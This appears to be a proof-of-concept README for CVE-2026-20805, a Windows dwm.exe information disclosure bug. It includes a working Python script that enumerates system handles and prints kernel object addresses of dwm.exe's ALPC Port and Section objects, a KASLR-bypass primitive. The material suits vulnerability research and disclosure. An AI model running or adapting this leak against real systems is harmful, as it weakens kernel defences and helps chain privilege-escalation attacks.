Proof of Concept demonstrating an information disclosure vulnerability in Microsoft Desktop Window Manager (dwm.exe).
This repository contains a custom Proof of Concept (PoC) developed to reproduce CVE-2026-20805, an information disclosure vulnerability in the Windows Desktop Window Manager process. The vulnerability allows a local, authenticated user to obtain kernel object pointers because of improper handling of ALPC-related structures, which weakens kernel exploit mitigations such as Kernel Address Space Layout Randomization (KASLR). This PoC was written independently after existing public scripts proved unstable or failed to run, with the aim of producing reliable, verifiable results.
- CVE ID: CVE-2026-20805
- Vulnerability Type: Information Disclosure (CWE-200)
- Affected Component: Desktop Window Manager (dwm.exe)
- Attack Vector: Local
- Impact: Kernel address disclosure (KASLR bypass primitive)
- Severity: Medium
The PoC uses low-level Windows Native APIs to enumerate every handle on the system and inspect the kernel metadata attached to each one. It calls NtQuerySystemInformation with the SystemHandleInformation class, filters the returned table down to the entries owned by the dwm.exe process, and keeps only those whose type index denotes an ALPC Port or a Section object. Each entry's Object field holds the kernel virtual address of the backing object, and reporting those addresses to the caller is the information leak the PoC demonstrates. Note that this information class has long returned object addresses to ordinary medium-integrity callers: Windows 8.1 onward zeroes the Object field for low-integrity callers, and Windows 11 24H2 withholds it from non-administrators. To show a defect rather than documented behaviour, run the PoC from the least-privileged context the advisory covers (a standard, non-elevated user), on the affected build, and confirm that the result differs on a patched build.
Objects of Interest
- ALPC Ports (Type Index 24 / 25)
- Section Objects (Type Index 36)
These type indices are those of the Windows build the PoC was tested on; they are not stable across builds, so resolve them at run time (for example by finding a handle of known type that the PoC itself owns in the same table, or via NtQueryObject with ObjectTypesInformation) rather than hardcoding them.
During execution, the PoC identified the dwm.exe process, enumerated several hundred handles owned by it, and disclosed valid 64-bit kernel virtual addresses for the objects of interest.
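The procedure above, as an added example that is not the repository's PoC (the author's code is not reproduced here): a Python script that calls NtQuerySystemInformation(SystemHandleInformation) through ctypes, decodes the x64 SYSTEM_HANDLE_TABLE_ENTRY_INFO layout, filters to dwm.exe's entries of the ALPC Port and Section types, and prints each Object pointer. It assumes the type indices quoted in this README (24/25 for ALPC Port, 36 for Section), calibrates the Section index at run time from a section the script creates itself, locates dwm.exe through tasklist, and treats any address at or above 0xFFFF800000000000 as kernel space. build_handle_table() is a helper that fabricates a table from constructed records so the parser can be checked off-line; it is not part of any Windows API.

```python
# Added example, not the repository's PoC: enumerate dwm.exe handles and report kernel pointers.
import struct
import subprocess
import sys

SystemHandleInformation = 16
STATUS_INFO_LENGTH_MISMATCH = 0xC0000004
INVALID_HANDLE_VALUE = 0xFFFFFFFFFFFFFFFF
# x64 SYSTEM_HANDLE_TABLE_ENTRY_INFO: USHORT UniqueProcessId, USHORT CreatorBackTraceIndex,
# UCHAR ObjectTypeIndex, UCHAR HandleAttributes, USHORT HandleValue, PVOID Object,
# ULONG GrantedAccess, 4 bytes tail padding (24 bytes); header is ULONG count + 4 pad bytes.
ENTRY_FMT = "<HHBBHQL4x"
ENTRY_SIZE = struct.calcsize(ENTRY_FMT)
HEADER_SIZE = 8
KERNEL_VA_MIN = 0xFFFF800000000000      # lowest canonical kernel address on x64
ASSUMED_TYPES = {24, 25, 36}            # README values: ALPC Port 24/25, Section 36 (build-specific)


def parse_handle_table(buf):
    """Decode a raw SYSTEM_HANDLE_INFORMATION buffer into a list of dicts."""
    (count,) = struct.unpack_from("<L", buf, 0)
    entries = []
    for i in range(count):
        pid, _bt, tidx, _attrs, hval, obj, access = struct.unpack_from(
            ENTRY_FMT, buf, HEADER_SIZE + i * ENTRY_SIZE)
        entries.append({"pid": pid, "type": tidx, "handle": hval, "object": obj, "access": access})
    return entries


def is_kernel_address(addr):
    return KERNEL_VA_MIN <= addr <= 0xFFFFFFFFFFFFFFFF


def filter_leaks(entries, pid, type_indices):
    """Entries owned by pid, of an interesting type, whose Object is a non-zero kernel
    pointer. A zero Object means the kernel withheld the address from this caller."""
    return [e for e in entries if e["pid"] == pid and e["type"] in type_indices
            and e["object"] != 0 and is_kernel_address(e["object"])]


def resolve_type_index(entries, pid, handle_value):
    """Read the type index off a handle the caller owns, instead of hardcoding it."""
    return next((e["type"] for e in entries
                 if e["pid"] == pid and e["handle"] == handle_value), None)


def build_handle_table(records):
    """Constructed buffer from (pid, type, handle, object) tuples, for offline testing only."""
    body = b"".join(struct.pack(ENTRY_FMT, p, 0, t, 0, h, o, 0x1F0001) for p, t, h, o in records)
    return struct.pack("<L4x", len(records)) + body


def query_system_handles():
    """Live query, Windows only. ReturnLength is unreliable for this class, so the
    buffer is doubled until the call stops reporting STATUS_INFO_LENGTH_MISMATCH."""
    import ctypes
    nt = ctypes.WinDLL("ntdll")
    nt.NtQuerySystemInformation.argtypes = [ctypes.c_ulong, ctypes.c_void_p,
                                            ctypes.c_ulong, ctypes.POINTER(ctypes.c_ulong)]
    nt.NtQuerySystemInformation.restype = ctypes.c_ulong
    size = 1 << 20
    while True:
        buf, ret = ctypes.create_string_buffer(size), ctypes.c_ulong(0)
        st = nt.NtQuerySystemInformation(SystemHandleInformation, buf, size, ctypes.byref(ret))
        if st != STATUS_INFO_LENGTH_MISMATCH:
            break
        size *= 2
    if st != 0:
        raise OSError(f"NtQuerySystemInformation failed: 0x{st:08X}")
    return buf.raw


def dwm_pid():
    """PID of the first dwm.exe (one exists per interactive session)."""
    out = subprocess.check_output(
        ["tasklist", "/FI", "IMAGENAME eq dwm.exe", "/FO", "CSV", "/NH"], text=True)
    for line in out.splitlines():
        if line.startswith('"dwm.exe"'):
            return int(line.split('","')[1])
    raise RuntimeError("dwm.exe not found")


def main():
    if sys.platform != "win32":
        print("Live enumeration needs Windows; the parser and filter run offline.")
        return
    import ctypes
    import os
    k32 = ctypes.WinDLL("kernel32")
    k32.CreateFileMappingW.restype = ctypes.c_void_p
    k32.CreateFileMappingW.argtypes = [ctypes.c_void_p, ctypes.c_void_p, ctypes.c_ulong,
                                       ctypes.c_ulong, ctypes.c_ulong, ctypes.c_wchar_p]
    # Calibrate the Section index from a pagefile-backed section we own, not the literal 36.
    sec = k32.CreateFileMappingW(ctypes.c_void_p(INVALID_HANDLE_VALUE), None, 0x04, 0, 4096, None)
    entries = parse_handle_table(query_system_handles())
    section_idx = resolve_type_index(entries, os.getpid(), sec)
    types = (ASSUMED_TYPES - {36}) | {36 if section_idx is None else section_idx}
    target = dwm_pid()
    print(f"dwm.exe pid {target}: {sum(e['pid'] == target for e in entries)} handles; "
          f"Section type index on this build = {section_idx}")
    for e in filter_leaks(entries, target, types):
        print(f"Handle: 0x{e['handle']:04X}  Type: {e['type']:3d}  Object: 0x{e['object']:016X}")


if __name__ == "__main__":
    main()
```

Run it as a standard user on the affected build. On a build where the kernel withholds the pointers the Object field comes back as zero and filter_leaks() drops the entry, so the output separates a real disclosure from a zeroed table rather than printing zeros as if they were addresses.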
Author: UZAIR AMJAD-TEAM_ALKAHF
Sample Output
Handle: 0x0004
Object: 0xFFFFD58F80C0E5E0 (Kernel Object Pointer)
Handle: 0x011C
Object: 0xFFFFD58F80C0E1E0 (ALPC Section Address)
The leaked addresses sit in the upper, canonical half of the x64 address space (0xFFFF800000000000 and above) that the kernel uses, which is consistent with kernel object pointers. An entry whose Object field is zero means the kernel withheld the pointer from the caller, so only non-zero values of this form count as a disclosure.